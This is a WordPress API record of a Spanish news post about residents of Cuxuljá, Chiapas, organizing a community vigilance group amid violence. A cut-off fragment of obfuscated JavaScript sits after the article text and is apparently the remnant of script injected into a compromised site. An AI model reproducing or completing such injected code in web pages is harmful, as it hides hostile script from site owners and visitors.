{"id":2402,"date":"2022-05-27T01:19:51","date_gmt":"2022-05-27T01:19:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2402"},"modified":"2022-05-27T01:19:52","modified_gmt":"2022-05-27T01:19:52","slug":"habitantes-de-la-region-selva-se-organizan-para-combatir-la-delincuencia","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2402","title":{"rendered":"Habitantes de la Regi\u00f3n Selva se organizan para combatir la delincuencia"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"720\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0022.jpg\" alt=\"\" class=\"wp-image-2403\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0022.jpg 960w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0022-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220526-WA0022-768x576.jpg 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 26 de mayo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Ante la grave situaci\u00f3n de inseguridad que prevalece en la Regi\u00f3n Selva del estado de Chiapas, habitantes de Cuxulj\u00e1 se han organizado para formar un grupo para vigilar y hacer valer la ley en este lugar de acuerdo con los usos y costumbres.En este escenario, expresaron que, en caso de sorprender a cualquier persona cometiendo cualquier delito ellos la poblaci\u00f3n de este lugar aplicar\u00e1 la ley.Cabe recordar que, hace unos d\u00edas en la zona Selva fueron localizadas siete personas ejecutadas con el tiro de gracia.Por ello, la poblaci\u00f3n ha comenzado a organizarse para contrarrestar esta lamentable situaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 26 de mayo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Ante la grave situaci\u00f3n de inseguridad que prevalece en la Regi\u00f3n Selva del estado de Chiapas, habitantes de Cuxulj\u00e1 se han organizado para formar un grupo para vigilar y hacer valer la ley en este lugar de acuerdo con los usos y costumbres.En este &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2403,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-2402","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2402","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2402"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2402\/revisions"}],"predecessor-version":[{"id":2404,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2402\/revisions\/2404"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2403"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2402"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2402"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2402"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}